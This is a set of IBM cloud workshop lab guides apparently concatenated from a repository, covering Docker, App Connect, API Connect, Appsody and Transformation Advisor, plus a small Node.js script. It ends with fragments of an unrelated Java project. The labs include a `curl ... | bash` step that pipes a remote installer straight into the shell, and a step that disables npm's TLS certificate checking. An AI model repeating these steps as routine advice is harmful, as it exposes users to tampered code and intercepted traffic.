availabe at step 2 in notepad for later steps. 6. Login to IBM Cloud to install sysdig agent 6.1. 
Open [https://katacoda.com/embed/terminal](https://katacoda.com/embed/terminal) 6.2 execute following command on terminal `curl -sL https://ibm.biz/idt-installer | bash` 6.3 Go to dashboard ->cluster->mycluster(clustername) 6.4 Click on mycluster(clustername) 6.5 From the access tabs execute the command specified in Kataconda terminal ``` ibmcloud login -a cloud.ibm.com -r us-south -g default (change the region based on the cluster region) ibmcloud ks cluster config --cluster replace_with_your_cluster_name (below command will come as output of executing above command) export KUBECONFIG=%HOMEPATH%\.bluemix\plugins\container-service\clusters\blqt6b8d062qlkfhap0g\kube-config-hou02-mycluster.yml Copy paste the command to your prompt and execute it. ``` 6.6. Execute command `ibmcloud target --cf` to select space 6.7 execute the command copied at step 5.2 6.8 verify `kubectl --namespace=ibm-observe get pods` to view the pods 7. View Sysdig dashboard 7.1 Go to Navigation menu->Observability > Monitoring. 7.2 Click View Sysdig 7.3 Click Next and select `Kubernetes|GKE|Openshift` option, Copy the 7.4 Once node is connected ,click on go to next step(visible in the same window) Congratulations, you have completed the lab. In this lab, you have learned how to get deep container visibility, service-oriented views and comprehensive metrics. <file_sep># Running Your First Container In this lab, you will run your first Docker container! Containers are just a process (or a group of processes) running in isolation. Isolation is achieved via linux namespaces and control groups. One thing to note, is that linux namespaces and control groups are features that are built into the linux kernel! Other than the linux kernel itself, there is nothing special about containers. What makes containers useful is the tooling that surrounds it. For these labs, we will be using Docker, which has been the de facto standard tool for using containers to build applications. 
Docker provides developers and operators with a friendly interface to build, ship and run containers on any environment. The first part of this lab, we will run our first container, and learn how to inspect it. We will be able to witness the namespace isolation that we acquire from the linux kernel. ## Pre-requisites: 1. Install Docker * [Docker for Windows](https://docs.docker.com/v17.09/docker-for-windows/install/) * [Docker for Mac](https://docs.docker.com/v17.09/docker-for-mac/install/) ## **Optional:** Use play-with-docker If you don't want to install Docker, an alternative is to use [Play-With-Docker](http://play-with-docker.com). Play-With-Docker is a website where you can run terminals directly from your browser that have Docker installed. All of the labs for this course can be run on Play-With-Docker, though we recommend installing docker locally on your host, so that you can continue your docker journey when this course has completed. To use Play-With-Docker, navigate to http://play-with-docker.com in your browser. ## Steps: We will start a container using verified images from the Docker Store: nginx web server. 1. Run an Nginx server Let's run a container using the [official Nginx image](https://store.docker.com/images/nginx) from the Docker Store. ```sh $ docker container run --detach --publish 8080:80 --name nginx nginx Unable to find image 'nginx:latest' locally latest: Pulling from library/nginx 36a46ebd5019: Pull complete 57168433389f: Pull complete 332ec8285c50: Pull complete Digest: sha256:c15f1fb8fd55c60c72f940a76da76a5fccce2fefa0dd9b17967b9e40b0355316 Status: Downloaded newer image for nginx:latest 5e1bf0e6b926bd73a66f98b3cbe23d04189c16a43d55dd46b8486359f6fdf048 ``` We are using a couple of new flags here. The `--detach` flag will run this container in the background. The `publish` flag publishes port 80 in the container (the default port for nginx), via port 8080 on our host. 
Remember that the NET namespace gives processes of the container their own network stack. The `--publish` flag is a feature that allows us to expose networking through the container onto the host. How do you know port 80 is the default port for nginx? Because it is listed in the [documentation](https://store.docker.com/images/nginx) on the Docker Store. In general, the documentation for the verified images is very good, and you will want to refer to them when running containers using those images. We are also specifying the `--name` flag, which names the container. Every container has a name, if you don't specify one, Docker will randomly assign one for you. Specifying your own name makes it easier to run subsequent commands on your container since you can reference the name instead of the id of the container. For example: `docker container inspect nginx` instead of `docker container inspect 5e1`. Since this is the first time you are running the nginx container, it will pull down the nginx image from the Docker Store. Subsequent containers created from the Nginx image will use the existing image located on your host. Nginx is a lightweight web server. You can access it on port 8080 on your localhost. 2. Check your running containers with `docker container ls` ```sh $ docker container ls CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES d6777df89fea nginx "nginx -g 'daemon ..." Less than a second ago Up 2 seconds 0.0.0.0:8080->80/tcp nginx ``` 3. Access the nginx server on http://localhost:8080. If you are using play-with-docker, look for the `8080` link near the top of the page. Congratulations, you should now see your Nginx web server container running on your host! <file_sep># APP-Connect-handson ## Overview In this lab, you will create a simple application flow using IBM App Connect. You will create a basic application flow for both event driven flows and flows for API. 
## [Steps to register for IBM Cloud](https://github.com/rachana5198/APP-Connect-handson#steps-to-register-for-ibm-cloud) Go to [IBM Cloud](https://cloud.ibm.com/login) If you are an existing user, login using your credentials. If you are new user, register for IBM cloud and login. ![](img/cloudlogin.png) ## [Setup an APP Connect service](https://github.com/rachana5198/APP-Connect-handson#setup-an-app-connect-service) 1. Let's go to [IBM Cloud Catalog](https://cloud.ibm.com/catalog) and search for App Connect. ![](img/catalogsearch.png) 2. Click on the service App Connect to instantiate it on IBM cloud. 3. Click on ```create``` ![](img/instancecreation.png) 4. Launch the service by clicking ```Launch App Connect``` ![](img/launch.png) ## [Creating event driven flows](https://github.com/rachana5198/APP-Connect-handson#creating-event-driven-flows) 1. After launching the dashboard, click on New. (Rename your flow, if needed) To create a new event driven flow, ```New -> Event-driven flow``` ![](img/newflow.png) 2. To add applications to your flow, Click on '+' and select applications that you want to add to your flow. Here, we are creating a simple flow to send slack messages at some interval of time. 3. To be able to schedule events, there is a tool called scheduler in the toolbox. To add this to your flow, ```+ -> Toolbox -> Scheduler``` ![](img/scheduler.png) 4. Configure the scheduler component according to your preferences. Here I am creating a flow that sends slack message for every one minute. ![](img/plus.png) 5. To add the next node to the flow, click on '+'. Here, we are adding email component so that we will be able to send message at scheduled time. To do this, ```+ -> Applications -> Slack -> Create message``` ![](img/slack.png) 6. Connect the account using which you want to automate this task(preferably your gmail account). To connect your account, ```Click on Slack node -> Connect```. 
This will redirect you to gmail login page, finish the login and permissions and refresh the IBM App connect page, then you should be able to see your account in the drop down. ![](img/connect.png) 7. Configure the slack node with your workspace url. If you don't have a [Slack workspace](https://slack.com/create), create a workspace for testing purposes. ![](img/slack1.png) Click allow ![](img/slackallow.png) Enter details in the slack nodes ![](img/configure.png) 8. To start the flow, click start from the right corner of the screen. ![](img/starteflow.png) 9. Once the flow starts and the dashboard shows the status 'Running' that means the event flow has started. To cross check, go to your Slack and see if there is a new message. ![](img/outputeflow.png) This is how event driven flows work, scroll down to see some sample flows in Sample flows section. ## [Creating flows for API](https://github.com/rachana5198/APP-Connect-handson#creating-flows-for-api) 1. To create flows for API, launch the App Connect dashboard and click on new then select flows for API. ``` Launch dashboard -> New -> Flows for API ``` ![](img/newaflow.png) 2. On creating, it will take you to the service page. Rename the flow(if needed). Give a name to the flow and click on Create model. ```Enter a model name -> create model``` ![](img/mname.png) 3. Add the properties that you want to add to the model that you are creating. Here, I am creating a simple flow that sends emails on sending a API request. ![](img/props.png) 4. After defining the properties, operations have to be added. Click on operations and select the operation that you want to perform. Here, I am selecting Create demo as operation. ``` Operations -> (scroll down) Create Demo``` ![](img/operations.png) 5. Wait for the model to load and then start adding nodes to your flow. I have added a POST method which automatically generated Request and Response nodes. 
Make sure that the request node has sample data configured in it which is auto-generated. Refresh the page if you are not able to see the changes. Click on `Implement Flow`. ![](img/implementflow.png) 6. To add nodes to your flow, click on '+' which is in between request and response nodes. Then, add nodes to your flow. Here, I am adding a Slack node to the flow. ``` + -> Applications -> Slack -> Create message ``` ![](img/plusslack.png) 7. Configure the slack node. If it's not connected, click on connect and give access to your account/default account that you want to set up. Check if your node is connected to your account. Refresh the page to see changes and make sure you see your account details when you click on the node. You can auto match the node fields or add them manually. Here, I am adding auto matched fields which are the node properties that we have added to the flow in the beginning. ![](img/slackconfigure.png) 8. Now configure the response node as well. We can either auto match the node details or give them manually. Here we have given them manually, based on requirement we can auto-match. ![](img/response.png) 9. Once when all the nodes of the flow are configured, click ```Done``` on the right corner of the screen. This will take you to the previous screen and you can see properties and operations on the screen. ![](img/response.png) 10. Now that the flow creation is done, we have to create an API to call the flow. To do this go to manage section of the dashboard. 11. ``` Manage -> Scroll``` ![](img/manage.png) 12. On the end of screen, click on create API under Sharing outside of cloud foundry organization. ```Manage -> Sharing Outside Cloud Foundry organization -> Create API``` ![](img/scroll.png) 13. Give the details required for API creation in the pop-up generated on clicking Create API. ```Create API -> Fill details -> Done``` ![](img/createapi.png) 14. Refresh the page. 
Start the flow by clicking Start from right corner of the screen.```Manage -> Start API``` and then click on the API link from ```Manage -> Sharing Outside Cloud Foundry organization -> Click API link```. This will redirect you to the API page. ![](img/link.png) 15. Click on ```Try it``` from the right corner which will generate automatic data. ![](img/tryit.png) 16. To test the API call, click on ```Call Operation```. ![](img/calloperation.png) 17. To check if the API is working, go to the Slack channel that you have set in the configuration flow. It will look something like this: ![](img/aoutput.png) Congratulations, You have completed the lab. You have learnt 1. How to create a basic event-driven flow that sends a simple message at scheduled time using APP Connect on IBM Cloud. 2. How to create a basic flow for API that sends a simple message on slack when the API operation is called using APP Connect on IBM Cloud. You can try out the below **Next steps** to explore further on App Connect. # Next Steps ## [Import and export flows](https://github.com/rachana5198/APP-Connect-handson#import-and-export-flows) #### EXPORT FLOWS 1. To export a flow, go to App Connect dashboard and click on the flow that you want to export. On clicking, select the option export flow. ```App Connect Dashboard -> Flow -> Export Flow``` ![](img/ef1.png) 2. Once you click on that, a yaml file is downloaded with the flow name. In this case, it is ```simple-scheduler.yaml``` ![](img/exportflow.png) #### IMPORT FLOWS 1. To import a flow, click on New from the right corner of App Connect Dashboard and select import flow. ```App Connect Dashboard -> New -> Import flow``` ![](img/if1.png) 2. Drag and drop the .yaml file of the flow that you want to import onto the dashboard of App Connect. ```drag and drop simple-scheduler.yaml -> Import flow``` ![](img/if2.png) 3. On finishing the import, you will be able to see a new flow on your App Connect dashboard. Start it to run the flow. 
![](img/final.png) ### [Sample flows](https://github.com/rachana5198/APP-Connect-handson#sample-flows) 1. Use the For Each node and JSONata to process high-priority issues. ![](img/sf1.png) 2. Create new leads in ```Marketo``` by capturing lead names and details in ```Slack``` ![](img/sf2.png) 3. For large ```Salesforce``` opportunities, send an email and create an ```Asana``` task ![](img/sf3.png) 4. At regular intervals, extract ```Salesforce lead details``` and upload ```Box files``` with CSV output. ![](img/sf4.png) 5. Create ```NetSuite ERP``` and Stripe products from ```Asana tasks``` to launch a ```Salesforce Pardot campaign```. ![](img/sf5.png) 6. Build an API to create or update leads in ```Salesforce``` based on a ```Google Sheets spreadsheet```. ![](img/sf6.png) ## [Integration servers with APP connect](https://github.com/rachana5198/APP-Connect-handson#integration-servers-with-app-connect) 1. Click New > Import a BAR file. ![](img/is1.png) 2. Either click the “Import a BAR file” dialog box to select a BAR file from your file system, or drag a BAR file from your file system to the dialog box. ![](img/is2.png) 3. Click Import. An integration server is created, and a tile is added to the dashboard to represent it. Initially, you’ll see the status as “Preparing”, which means that the contents of the BAR file are being unpacked onto the integration server. When preparation has finished, the status will show as “Stopped”, indicating that the integration server is ready to be configured and started. If you see a message saying that preparation failed, click Try again in the message to start preparation again. You can see a summary of the contents of the integration server by clicking the arrow. The arrow icon that allows you to see a summary of the contents of an integration server on the tile. 4. Open the integration server by clicking the tile, or expanding the tile menu (⋮) and then clicking Open. 5. Configure the integration server and start it. 6. 
When you’ve completed configuration, return to the App Connect on IBM Cloud dashboard and start the integration server by opening the tile menu and then clicking Start. ![](img/startis.png) 7. You can also use the tile menu to delete or update the BAR file. The “update” option allows you to upload a new version of a BAR file. On clicking the integration server that you have uploaded, it looks something like this: ![](img/viewlogs.png) 8. When your integration server is running, you can view logs by opening the integration server and then clicking View logs. ```Server page -> View logs``` ![](img/viewlogs.png) ![](img/isoutput.png) <file_sep>var http=require('http'); const inquirer = require('inquirer') var result="none"; const jsdom = require("jsdom"); const dom = new jsdom.JSDOM(`<!DOCTYPE html>`); var $ = require("jquery")(dom.window); const circuitBreaker = require('opossum'); var questions = [{ type: 'input', name: 'name', message: "Command : ", }] http.createServer(function (request, response) { //function called when request is received response.writeHead(200, {'Content-Type': 'text/plain'}); //send this response response.end(result); }).listen(3600, '127.0.0.1'); const route = 'http://localhost:5000/getMongo'; function tryagin() { //Request the API var request1=http.request({ 'host': 'localhost', 'port': 5000, 'path': '/getMongo', 'method': 'GET' }); //assign callbacks request1.on('response', function(response) { // console.log('Response status code:'+response.statusCode); response.on('data', function(data) { console.log(''+data); }); }).on('error', function(e) { //console.error("ms2 : I am Dead"); }); request1.end(); } function recur(){ inquirer.prompt(questions).then(answers => { if(`${answers['name']}` == "requestdb") { tryagin(); } recur(); }) } recur(); //setInterval(check, 1000); <file_sep># API Connect hands-on ## Overview IBM API Connect is a comprehensive end-to-end API lifecycle solution. APIs are created within the developer toolkit. 
The developer toolkit includes a CLI and API Designer graphical user interface. To access the developer toolkit, you need to download and install it from npm. When you install the toolkit, you begin by creating a LoopBack project \ • ```LoopBack project```: The LoopBack project contains the LoopBack application and API Product \ • ```LoopBack application```: Within the Loopback application is the API endpoint that provides access to your data source, business asset, or cloud service \ • ```Product```: The Product is the unit that enables you to publish your APIs. A Product contains a Plan and a Plan contains the API that invokes the API endpoint when it is called. ## Items to be covered: 1. Create a new LoopBack project. 2. Add a new data source and model to a LoopBack project using the API Designer in the IBM® API Connect for IBM Cloud toolkit. Pre-requisites: 1. An IBM Cloud account with Organization and Spaces created within account. 2. Install Node.js and npm 3. Before you begin, install the API Connect toolkit. ## [Steps to register for IBM Cloud](https://github.com/rachana5198/APP-Connect-handson#steps-to-register-for-ibm-cloud) Go to [IBM Cloud](https://cloud.ibm.com/login) If you are a existing user, login using your credentials. If you are new user, register for IBM cloud and login. ![](img/Picture1.png) ## Steps to install NODE.JS 1) Download and install node.js from one of the two sources: https://nodejs.org/en/download/ (Note: Download the LTS version for your platform, not the latest, or you might experience errors.) OR o https://developer.ibm.com/node/sdk/v6/ Installing node.js also installs npm (Node Package Manager). 2) Once Node.js is downloaded and install, check to make sure it is in your PATH. 3) Update npm. In a command line, enter npm install -g npm Check the installed version and path. ![](img/Picture2.png) ## Install the API CONNECT TOOLKIT 1) Update the npm config to allow use of untrusted certificates. 
npm config -g set strict-ssl false 2) Install the API Connect toolkit from npm. npm install -g apiconnect 3) Check the installed version. apic -v 4) Enter the following command on the command line: npm install -g microgateway We will use the Microgateway as a local test server. Here we should have successfully installed the IBM API Connect. Once the toolkit is installed,You can verify this by entering the following command on the command-line: ![](img/Picture3.png) ## Let us now move to the objective of this hands on. ## CREATE A LOOPBACK PROJECT To create a LoopBack project using the API Connect toolkit command line, complete the following steps: 1) From the command-line interface, enter the following commands. It is used to create and manage LoopBack applications. ![](img/Picture4.png) For this session we will create a project called ```weather-data``` ![](img/Picture5.png) This process creates a node_modules directory and might take some time. An empty LoopBack project contains the following directories: ![](img/Picture6.png) ## ADD A NEW DATA SOURCE AND MODEL To add a new model and data source to a LoopBack project using the API Designer, complete the following steps: ## Add a data source To add a new data source to a LoopBack project using the API Designer, complete the following steps. 1) You must also create a LoopBack project (the "weather-data" project) as described in Create a LoopBack project from the command line and make sure the current working directory is the project root directory 2) From the command line, enter the following command:```apic edit``` After a brief pause, the console displays this message: ![](img/Picture7.png) The API Designer opens in your default web browser, initially displaying the login page if you haven't logged in recently. ![](img/Picture8.png) 3)Login using your IBM Cloud credentials ![](img/Picture9.png) 4)Click the Data Sources icon ![](img/Picture10.png) ![](img/Picture11.png) 5) Click Add. 
The New LoopBack Data Source window opens. 6) Enter ```weatherDS``` in the Name text field ![](img/Picture12.png) 7) Click New 8) By default, the Connector setting shows In-memory db and the other settings are blank. Keep the default settings for now, and API Designer automatically saves the new data source. ![](img/Picture13.png) 9) Click the Test Connection icon ![](img/Picture14.png) to test the data source connection. The message "Data source connection test succeeded" is displayed. ![](img/Picture15.png) 10) Click ```All Data Sources``` The data source will appear in the list of data sources, and the editor updates the server/datasources.json file with settings for the new data source. ![](img/Picture16.png) ## Add a model To add a new model to a LoopBack project using the API Designer, complete the following steps: 1) Click the Models icon![](img/Picture19.png) \ 2) Click Add. The New LoopBack Model window opens. \ 3) Enter weather in the Name text field, then click New. ![](img/Picture17.png) 4) In the Data Source field, select ```weatherDS``` ![](img/Picture18.png) 5) In the Properties, click the Add property icon . \ 6) In the Property Name text field, enter zip_code. \ 7) For Type, select number. \ 8) Select Required to make the property required. This means that it must have a value when you add or update a model instance. \ 9) Select ID to ensure that the property has a unique identifier. For now, keep the default values for the other settings: ![](img/Picture20.png) 10) Click the Add property icon![](img/Picture21.png) again to add another property. Reference the table below to complete the remaining properties: ![](img/Picture22.png) 11) Click the Save icon to save your changes![](img/Picture23.png) 12) Click All Models to finish editing the model This completes adding a new data source and model to the weather-data LoopBack project Congratulations, you have completed the lab! 
You have now learnt how to create a loopback project by adding data source and model. ## Next Steps: Publishing API CONNECT to IBM CLOUD Please refer to the video below to understand how we can publish the API Connect projects to the IBM Cloud Catalog. [![Publish Api Connect to IBM Cloud](https://img.youtube.com/vi/U4meXJWV4us/maxresdefault.jpg)](https://www.youtube.com/watch?v=U4meXJWV4us) <file_sep># Cloud Native Development Workshop We will be using Appsody from Kabanero Project for this hands on. ### 1. Sign up on Docker https://hub.docker.com/ ### 2. Get the environment https://www.katacoda.com/courses/ubuntu/playground1804 Sign in using your gmail id. ### 3. Check the OS ``` $ cat /etc/os-release ``` output should be ``` NAME="Ubuntu" VERSION="18.04.2 LTS (Bionic Beaver)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 18.04.2 LTS" VERSION_ID="18.04" HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" VERSION_CODENAME=bionic UBUNTU_CODENAME=bionic ``` ### 4. Install Appsody Get installable ``` $ wget https://github.com/appsody/appsody/releases/download/0.2.8/appsody_0.2.8_amd64.deb $ sudo apt install ./appsody_0.2.8_amd64.deb ``` ### 5. Login to IBM Cloud CLI For Mac or Linux: -> To install latest version of the IBM Cloud CLI, run the command: `$ curl -sL https://ibm.biz/idt-installer | bash ` -> To verify that the CLI and Developer tools were installed successfully, run the help command: `$ ibmcloud dev help` Output lists the usage instructions, the current version, and the supported commands. -> Now configure your environment, log in to IBM Cloud with your IBMid. `$ ibmcloud login` -> To access Cloud Foundry services, you must specify a Cloud Foundry org and space. 
You can run the following command to interactively identify the org and space: `$ ibmcloud target --cf` Or, if you know which org and space that the service belongs to, you can use the following command: `$ ibmcloud target -o <value> -s <value>` The above commands are also available in the web page: https://cloud.ibm.com/docs/cli?topic=cloud-cli-getting-started ### 6. Connect to your Kubernetes cluster created on IBM Cloud. Go to browser and login to IBM Cloud UI. https://cloud.ibm.com/login ![GitHub Logo](images/dashboard.png) _From the Dashboard, click on the Kubernetes cluster._ ![GitHub Logo](images/cluster.png) _ Click on Connect via CLI. _ ![GitHub Logo](images/connectcli.png) _A pop-up window will appear._ ![GitHub Logo](images/popup.png) ![GitHub Logo](images/popup2.png) Execute the commands from your pop-up window on the command prompt. ### 7. Create Projects Appsody First, choose a development stack. To see all the available stacks, run: ``` $ appsody list ``` Create a new directory for your project and run appsody init <stack> to download the template project. The following example uses the nodejs-express stack to create a fully functional Appsody project: ``` $ mkdir illustration $ cd illustration $ appsody init nodejs-express ``` ### 8. Start the development container: ``` $ appsody run ``` ### 9. Check your application is running Now the project is running in a docker container, and the container is linked to the project source code on your local system. Great! Open New terminal ``` $ curl http://localhost:3000 ``` OR open in browser: http://localhost:3000 You should see out put as ``` "Hello from Appsody!" ``` ### 10. Change the code Now let's try changing the code. Edit the file app.js to output something other than "Hello from Appsody!". When you save the file, Appsody picks up the change and automatically updates the container. 
Run ``` $ curl http://localhost:3000 ``` OR If using Mac/Linux local machine command prompt, open in browser: http://localhost:3000 to see the new message! ### 11. Now, let's tag and push the container onto docker hub and deploy the image to your IBM Kubernetes cluster. In the command prompt, login to docker with your username/password. Sign up if you are a new user. ``` $ docker login ``` -> Build the container ``` $ appsody build ``` -> Tag and push the image to docker hub ``` $ docker tag <app-name> <docker_user>/<app-name> ``` For this appsody project: ``` $ docker tag illustration myDockerUsername/illustration ``` Now push: ``` $ docker push <docker_user>/<app-name> ``` For this appsody project: ``` $ docker push myDockerUsername/illustration ``` -> Deploy. ``` $ appsody deploy ``` One step command to build, tag, push and deploy the development container on to the Kubernetes cluster: ``` $ appsody deploy --tag <dockerhub-space>/<app-name>:<version> --push ``` In this case: ``` $ appsody deploy --tag <mydocker-username>/illustration:1 --push ``` Output: : : Attempting to get resource from Kubernetes ... Running command: kubectl[get svc sampleapp -o jsonpath=http://{.status.loadBalancer.ingress[0].hostname}:{.spec.ports[0].nodePort} --namespace default] Deployed project running at http://:31649 Note the port number that the project is deployed on. Fetch the external IP of your cluster with the command: ``` $ kubectl get node -o wide ``` ### 12. Check your application is running If using Mac/Linux local machine command prompt, open your web browser with http://[external-ip-cluster]:[port-no] OR Open New terminal ``` $ curl http://[external-ip-cluster]:[port-no] ``` You should see the message output. When you're all done, you can stop the environment. <file_sep># Modernize Applications using Transformation Advisor Local ## Introduction The process of modernizing applications and moving to the cloud can be a large undertaking. 
Careful planning is needed to prepare business inventory and infrastructure and to determine the best path forward for each application. If you don't yet have a cloud platform but are ready to begin the assessment for your modernization journey, this lab can help you get started. The IBM Transformation Advisor Local (Beta) is a tool that quickly evaluates your on-premises applications for rapid deployment on WebSphere Application Server and Liberty on public or private cloud environments. Transformation Advisor supports legacy applications running on the following platforms: * WebSphere Application Server * JBoss AS * Oracle Web Logic * Apache Tomcat * Plain Old Java Objects running in a JVM ## Pre-requisite 1) Before you can install IBM Cloud™ Transformation Advisor Local (Beta), go to the Registration and download site to download the files and accept license terms. [https://www.ibm.com/account/reg/in-en/signup?formid=urx-38642](https://www.ibm.com/account/reg/in-en/signup?formid=urx-38642) 2) Then, make sure that you meet the prerequisites for your operating system and follow the installation instructions. Docker Desktop or Docker Toolbox is required to run Transformation Advisor locally on Windows. For Linux and MacOS you need Docker and Docker Compose. ### Installation on Linux/MacOS This task covers how to install IBM Transformation Advisor locally on Linux or MacOS. 
Before you start, ensure that the following products are installed: #### Pre-requisite on Linux/MacOS * Docker: [https://docs.docker.com/docker-for-mac/install/](https://docs.docker.com/docker-for-mac/install/) [https://docs.docker.com/install/linux/docker-ce/ubuntu/#install-docker-engine---community-1](https://docs.docker.com/install/linux/docker-ce/ubuntu/#install-docker-engine---community-1) * Docker Compose: [https://docs.docker.com/compose/install/](https://docs.docker.com/compose/install/) #### Get started with Transformation Advisor installation on Linux/MacOS 1) Create a directory for the Transformation Advisor files, for example, ta_local. Copy the .zip file that you downloaded during the registration step into this directory and extract it: unzip transformationAdvisor.zip 2) To install Transformation Advisor locally, run the following command: ./launchTransformationAdvisor.sh 3) Select 1 if you agree with the terms of the License. 4) Select 1 to install Transformation Advisor. ![GitHub Logo](images/install_options.png) 5) After the installation is complete, you can access Transformation Advisor locally at the following URLs. The host name or IP address and port are provided by the installation program. ![GitHub Logo](images/install_complete.png) Linux: http://< host name >:< port > MacOS: http://< IP Address >:< port > ![GitHub Logo](images/landingPage.png) ### For Windows: Watch this video to install on windows: https://youtu.be/45xiAUDhiMk #### Pre-requisite on Windows Download Docker Desktop for Windows: https://docs.docker.com/docker-for-windows/install/ Sign in to docker: https://hub.docker.com/editions/community/docker-ce-desktop-windows #### Get started with Transformation Advisor installation on Windows 1) Create a folder, say "ta_local". Download the Docker Desktop for Windows executable to this folder. 2) Enable shared drives so that Transformation Advisor can mount volumes: a. 
Open the Docker Desktop for Windows menu by right-clicking the Docker icon in the Notifications area. b. Select Settings. c. Click Shared Drives. d. Check the box for the C drive. e. To apply shared drives, enter your Windows system (domain) user name and password. If your username and password are not accepted, refer to the [Docker Troubleshooting documentation](https://docs.docker.com/docker-for-windows/troubleshoot/#verify-domain-user-has-permissions-for-shared-drives-volumes) for permissions issues with shared drives. 3) Create a ta_local directory, for example C:\Users\ta_local\dockerCompose, and put the .env and Docker-compose.yml files there. 4) Open a terminal session.Change to the directory where the Docker-compose.yml and .env files are located. 5) Make sure that Docker is running: docker ps 6) Pull the Transformation Advisor images: docker-compose pull 7) Start the containers and run them in the background: docker-compose up -d 8) Verify that three containers are created: docker ps You see something similar to the following output: ibmcom/transformation-advisor-ui:latest ibmcom/transformation-advisor-server:latest ibmcom/transformation-advisor-db:latest 9) Access the Transformation Advisor UI at the following URL: http://< host >:2221 # Exploring Transformation Advisor In this short lab - 1) You will run Transformation Advisor against the data collected from an instance of WebSphere Application Server V8.5.5 and examine the recommendations provided for a different Java EE applications. 2) You will then look at the artifacts generated for one those apps (the later version of the WebSphere sample app Plants By WebSphere) for deployment on a Liberty container running in Kubernetes using the migration bundle generated for this app by Transformation Advisor. ### Step 1: Getting Started with the Transformation Advisor Transformation Advisor organizes your legacy server scans into workspaces and collections. 
Specific server scans are typically put into separate collections. You'll use a completed server scan as a starting point for the lab. 1. Download the server scan by right-clicking on [this link](https://github.com//IBMAppModernization/app-modernization-ta-explore-lab/raw/master/ta/AppSrv01.zip) and selecting **Save Link As** from the context menu to save the file locally. 2. Go to the homepage of the Transformation Advisor (the URL obtained from the Installation steps). 3. Click on **Add a new workspace**. 4. Enter a unique name for your workspace, e.g. `usernnn_ta_workspace` where `usernnn` is your assigned user ID (e.g. `user011`). 5. Click **Next** and enter a name for the collection, e.g. `lab_collection`. 6. Click **Let's go**. ### Step 2: Download and run the Data Collector 1. At this point you have the option of downloading a data collection script for your legacy server to collect the data about all the installed applications, or uploading the results of a data collection script. Click **Upload data**, then click **Drop or Add File** and select the file **AppSrv01.zip** you downloaded previously. ![Uploading data collection file](images/ss1.png) 2. Click **Upload** to upload the file. ### Step 3: View the recommendations and cost estimates 1. Check the Recommendations tab to view the results as described in the next step. You should be presented with a summary of recommendations for 4 applications running on the WebSphere Application Server instance where the data collection script was run. ![Recommendations summary](images/ss2.png) 2. Let's look at the apps marked in red, which indicates that changes to the app are required before running the app on WebSphere Liberty. Click on the link for the app **petstore-WAS.ear**. This is a Java EE 5 app written by the Java BluePrints program that validates several Java EE 5 features. ![Pet Store](images/ss3.png) 3. Scroll down to the bottom of the page and click on **Analysis Report**. Click **OK** when prompted. 4. 
The analysis will open up in a new browser tab. Scroll down to the section with title **Detailed Results by Rule** and click on **Show rule help** next to the rule named **The JSF SunRI engine was removed** to see more details about what needs to be fixed to migrate the Java Pet Store app to WebSphere Liberty running on ICP. Take a look at some of the other information in the report to get a feel for what type of information to expect when running Transformation Advisor against your own legacy Java EE apps. ![Sun JSF RI](images/ss4.png) 5. Go back to the **IBM Transformation** browser tab and click on **<- Recommendations** to go back to the list of apps. ![Recommendation link](images/ss5.png) 6. This time take a look at one of the "show stoppers" for the app **plants-by-websphere-jee5.ear** by selecting the app and then clicking on the Analysis Report link. This version of the WebSphere sample Plants by WebSphere was shipped with WebSphere Application Server V7.0. Two of the three severe issues have to do with no support for the JAX-RPC API in Liberty. Note: with the explosion of REST based APIs, technologies like JAX-RPC and SOAP/WSDL have become more or less obsolete. 7. Go back to the **IBM Transformation** browser tab and click on **<- Recommendations** to go back to the list of apps. 8. Now you'll look at the migration plan for the app **plants-by-websphere-jee6-mysql.ear**. This is the Plants By WebSphere app that comes with WebSphere Application Server 8.5.5 and has been tweaked to work with the MySQL database instead of the embedded Apache Derby database that the original uses. Note that this version uses JAX-RS (the Java API for RESTful Web Services) instead of JAX-RPC and JAX-RS is fully supported on WebSphere Liberty. Click on **Migration plan** as shown below ![Migration Plan](images/ss6.png) 9. On the left you should see a list of files generated to aid the migration of the app to Liberty running in IBM Cloud Pak for Applications on Private Cloud . 
On the right click the link **View the steps ->** ![View the steps](images/ss7.png) 10. Note that various options are supported including a Dockerfile, a helm chart and manifest for deployment to any Kubernetes cluster (IBM Cloud Private, Open Shift, IBM Cloud Kubernetes Service etc). 11. Look through the migration steps. You'll be (more or less) following these steps if you use this tool to aid in the migration of your own legacy apps to a modern containerized environment. # Experience Centre for TA See how the IBM Cloud Paks can accelerate your journey to the cloud with access to a hosted environment. Follow the documentation in the link https://github.ibm.com/ispandey/TAWorkshop , to learn how to gather data about your applications, assess their cloud readiness, and chart your roadmap to application modernization. ## Summary You've gone through the process of evaluating various legacy WebSphere Application Server apps for migration to a containerized version running on WebSphere Liberty in Kubernetes.
a005730ab813ddc5867c15532336eada17be3b57
[ "Markdown", "JavaScript" ]
13
Markdown
IBMDevConnect/appmod-workshops
a4468852d5e245394a5ed55e7a9c303fd767c4a9
e66e414bf4a0631e2042944262098e5d1bce28a2
refs/heads/master
<repo_name>lukasgor/react-native-auth<file_sep>/index.ios.js import { AppRegistry } from 'react-native'; import App from './src/App'; const func = () => { return ( 1 ) } AppRegistry.registerComponent('auth', () => App)
39ea775aaf44ac3e5e8d57e2a23a47c39bec94d7
[ "JavaScript" ]
1
JavaScript
lukasgor/react-native-auth
23d5c534b8afacbf5245a1371c7bbb9fe0cd3956
a3387f51dbc80019ce25122d5cf9560c8a672440
refs/heads/master
<repo_name>iamamirshabir/DIPS-UI<file_sep>/src/main/java/com/pioneer/dips/symptoms/repository/symptomRepository.java
package com.pioneer.dips.symptoms.repository;

import org.springframework.data.jpa.repository.JpaRepository;

import com.pioneer.dips.symptoms.model.Symptom;

/**
 * Spring Data JPA repository for {@link Symptom} entities; inherits the
 * standard CRUD and paging operations from {@link JpaRepository}.
 * No custom query methods are declared.
 * NOTE(review): the interface name breaks Java PascalCase convention
 * (SymptomRepository) — confirm before renaming, as Spring wires it by type.
 */
public interface symptomRepository extends JpaRepository<Symptom, Long> {

}
<file_sep>/src/main/java/com/pioneer/dips/diagnosis/DiseaseClassifierController.java
package com.pioneer.dips.diagnosis;

import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
//import org.springframework.hateoas.EntityModel;
//import org.springframework.hateoas.IanaLinkRelations;
//import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.GetMapping;
